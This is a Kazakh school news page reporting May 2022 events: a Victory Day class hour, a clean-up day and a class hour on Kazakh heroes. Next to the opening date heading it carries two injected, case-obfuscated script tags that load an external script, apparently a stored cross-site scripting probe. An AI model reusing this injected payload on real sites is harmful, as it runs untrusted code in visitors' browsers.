Жаңалықтар 03.05.2022<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
05.05.2022
Бүгін, 3-мамыр күні 9 сынып оқушыларымен 9 мамыр Жеңіс күніне орай «Ешкім де, ештеңе де ұмытылмайды» тақырыбында тәрбие сағаты өткізілді.
Тәрбие сағатының мақсаты - оқушыларға адамгершілікке, Отанын сүюге, оны қорғауға, Ұлы Отан соғысымен, қазақстандықтардың ерлік істерімен таныстырып, ой-өрісін дамыту. Оқушыларға Ұлы Отан соғысындағы батырларымыздың ерлігі мен бастан кешкен қасіреті жайлы ақпараттар, бейнефильмдер көрсетілді. Сабақ соңынан оқушылар алған әсерлерімен бөлісті.
Бүгін мектебімізде "Жасыл науқан" акциясы аясында сенбілік өтті. Мақсаты - қоршаған ортаны қорғау.
3-мамыр күні 3"А" сыныбында "Қазақ халқының батыр ұлдары" тақырыбында сынып сағаты өткізілді.
Мақсаты - оқушыларды адамгершілікке, Отанын сүюге, оны қорғауға баулу. Отанға деген сүйіспеншілігін арттыру және патриоттық сезімін ояту, елін, жерін құрмет тұту.